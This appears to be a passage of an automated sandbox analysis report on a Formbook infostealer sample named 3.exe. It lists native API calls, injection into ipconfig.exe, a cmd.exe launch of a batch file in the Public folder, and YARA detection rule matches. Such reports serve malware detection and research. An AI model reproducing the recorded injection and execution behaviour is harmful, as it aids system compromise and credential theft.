          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A50 NtCreateFile,LdrInitializeThunk,1_2_00AE9A50
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE95D0 NtClose,LdrInitializeThunk,1_2_00AE95D0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9540 NtReadFile,LdrInitializeThunk,1_2_00AE9540
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AE96E0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AE9660
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AE97A0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AE9780
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AE9FE0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AE9710
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE98A0 NtWriteVirtualMemory,1_2_00AE98A0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9820 NtEnumerateKey,1_2_00AE9820
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEB040 NtSuspendThread,1_2_00AEB040
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE99D0 NtCreateProcessEx,1_2_00AE99D0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9950 NtQueueApcThread,1_2_00AE9950
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A80 NtOpenDirectoryObject,1_2_00AE9A80
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9A10 NtQuerySection,1_2_00AE9A10
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEA3B0 NtGetContextThread,1_2_00AEA3B0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9B00 NtSetValueKey,1_2_00AE9B00
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE95F0 NtQueryInformationFile,1_2_00AE95F0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9520 NtWaitForSingleObject,1_2_00AE9520
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEAD30 NtSetContextThread,1_2_00AEAD30
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9560 NtWriteFile,1_2_00AE9560
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE96D0 NtCreateKey,1_2_00AE96D0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9610 NtEnumerateValueKey,1_2_00AE9610
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9670 NtQueryInformationProcess,1_2_00AE9670
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9650 NtQueryValueKey,1_2_00AE9650
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9730 NtQueryVirtualMemory,1_2_00AE9730
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEA710 NtOpenProcessToken,1_2_00AEA710
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9760 NtOpenProcess,1_2_00AE9760
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AE9770 NtSetInformationFile,1_2_00AE9770
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AEA770 NtOpenThread,1_2_00AEA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A50 NtCreateFile,LdrInitializeThunk,19_2_02BE9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9860 NtQuerySystemInformation,LdrInitializeThunk,19_2_02BE9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9840 NtDelayExecution,LdrInitializeThunk,19_2_02BE9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE99A0 NtCreateSection,LdrInitializeThunk,19_2_02BE99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_02BE9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE96E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_02BE96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE96D0 NtCreateKey,LdrInitializeThunk,19_2_02BE96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9780 NtMapViewOfSection,LdrInitializeThunk,19_2_02BE9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9FE0 NtCreateMutant,LdrInitializeThunk,19_2_02BE9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9710 NtQueryInformationToken,LdrInitializeThunk,19_2_02BE9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95D0 NtClose,LdrInitializeThunk,19_2_02BE95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9540 NtReadFile,LdrInitializeThunk,19_2_02BE9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A80 NtOpenDirectoryObject,19_2_02BE9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A20 NtResumeThread,19_2_02BE9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A10 NtQuerySection,19_2_02BE9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9A00 NtProtectVirtualMemory,19_2_02BE9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA3B0 NtGetContextThread,19_2_02BEA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9B00 NtSetValueKey,19_2_02BE9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98A0 NtWriteVirtualMemory,19_2_02BE98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE98F0 NtReadVirtualMemory,19_2_02BE98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9820 NtEnumerateKey,19_2_02BE9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEB040 NtSuspendThread,19_2_02BEB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE99D0 NtCreateProcessEx,19_2_02BE99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9950 NtQueueApcThread,19_2_02BE9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9610 NtEnumerateValueKey,19_2_02BE9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9670 NtQueryInformationProcess,19_2_02BE9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9660 NtAllocateVirtualMemory,19_2_02BE9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9650 NtQueryValueKey,19_2_02BE9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE97A0 NtUnmapViewOfSection,19_2_02BE97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9730 NtQueryVirtualMemory,19_2_02BE9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA710 NtOpenProcessToken,19_2_02BEA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEA770 NtOpenThread,19_2_02BEA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9770 NtSetInformationFile,19_2_02BE9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9760 NtOpenProcess,19_2_02BE9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE95F0 NtQueryInformationFile,19_2_02BE95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BEAD30 NtSetContextThread,19_2_02BEAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9520 NtWaitForSingleObject,19_2_02BE9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE9560 NtWriteFile,19_2_02BE9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001281B0 NtCreateFile,19_2_001281B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00128260 NtReadFile,19_2_00128260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282E0 NtClose,19_2_001282E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_001282DA NtClose,19_2_001282DA
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230A0980_3_0230A098
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC20_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC20_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C700_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C700_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_0230A0980_3_0230A098
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC20_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309FC20_3_02309FC2
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C700_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 0_3_02309C700_3_02309C70
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041BBCF1_2_0041BBCF
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041C38B1_2_0041C38B
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00408C4C1_2_00408C4C
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00408C501_2_00408C50
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041B4931_2_0041B493
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041C5731_2_0041C573
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041CE281_2_0041CE28
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041BEFB1_2_0041BEFB
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041CF7E1_2_0041CF7E
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041C7EA1_2_0041C7EA
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_0041BFAB1_2_0041BFAB
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD20A01_2_00AD20A0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B720A81_2_00B720A8
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABB0901_2_00ABB090
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B728EC1_2_00B728EC
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7E8241_2_00B7E824
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA8301_2_00ACA830
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B610021_2_00B61002
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC99BF1_2_00AC99BF
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC41201_2_00AC4120
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AAF9001_2_00AAF900
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B722AE1_2_00B722AE
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B5FA2B1_2_00B5FA2B
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADEBB01_2_00ADEBB0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B523E31_2_00B523E3
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6DBD21_2_00B6DBD2
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B603DA1_2_00B603DA
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ADABD81_2_00ADABD8
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B72B281_2_00B72B28
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACA3091_2_00ACA309
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ACAB401_2_00ACAB40
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AB841F1_2_00AB841F
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6D4661_2_00B6D466
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AD25811_2_00AD2581
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00ABD5E01_2_00ABD5E0
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B725DD1_2_00B725DD
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AA0D201_2_00AA0D20
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B72D071_2_00B72D07
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B71D551_2_00B71D55
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B72EF71_2_00B72EF7
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00AC6E301_2_00AC6E30
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B6D6161_2_00B6D616
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B71FF11_2_00B71FF1
          Source: C:\Users\user\Desktop\3.exeCode function: 1_2_00B7DFCE1_2_00B7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C64AEF19_2_02C64AEF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C722AE19_2_02C722AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB23619_2_02BCB236
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C5FA2B19_2_02C5FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDEBB019_2_02BDEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6DBD219_2_02C6DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C603DA19_2_02C603DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C523E319_2_02C523E3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD138B19_2_02BD138B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDABD819_2_02BDABD8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C4CB4F19_2_02C4CB4F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA30919_2_02BCA309
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C72B2819_2_02C72B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCAB4019_2_02BCAB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A019_2_02BD20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBB09019_2_02BBB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C728EC19_2_02C728EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C720A819_2_02C720A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA83019_2_02BCA830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6100219_2_02C61002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C7E82419_2_02C7E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC99BF19_2_02BC99BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC412019_2_02BC4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BAF90019_2_02BAF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C72EF719_2_02C72EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC6E3019_2_02BC6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6D61619_2_02C6D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C7DFCE19_2_02C7DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C71FF119_2_02C71FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6449619_2_02C64496
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C6D46619_2_02C6D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BB841F19_2_02BB841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB47719_2_02BCB477
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C725DD19_2_02C725DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD258119_2_02BD2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C62D8219_2_02C62D82
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBD5E019_2_02BBD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C71D5519_2_02C71D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA0D2019_2_02BA0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C72D0719_2_02C72D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0011103019_2_00111030
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012C38B19_2_0012C38B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00118C5019_2_00118C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00118C4C19_2_00118C4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012B49319_2_0012B493
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012C57319_2_0012C573
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00112D9019_2_00112D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00112D8719_2_00112D87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012CE2819_2_0012CE28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012CF7E19_2_0012CF7E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_00112FB019_2_00112FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012BFAA19_2_0012BFAA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_0012C7EA19_2_0012C7EA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02BAB150 appears 136 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 00AAB150 appears 90 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 0230A358 appears 40 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 02305898 appears 48 times
          Source: C:\Users\user\Desktop\3.exeCode function: String function: 02304D43 appears 56 times
          Source: 3.exeStatic PE information: invalid certificate
          Source: 3.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: 3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 3.exe, 00000001.00000003.242843726.0000000000866000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3.exe
          Source: 3.exe, 00000001.00000002.303149513.000000000066E000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs 3.exe
          Source: 3.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.217187289.0000000003088000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215422596.0000000003068000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215851322.0000000003084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.215763701.000000000306C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.215525181.0000000003080000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.216098891.0000000003098000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 00000000.00000003.215441416.0000000003084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@14/5@14/5
          Source: C:\Users\user\Desktop\3.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:204:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
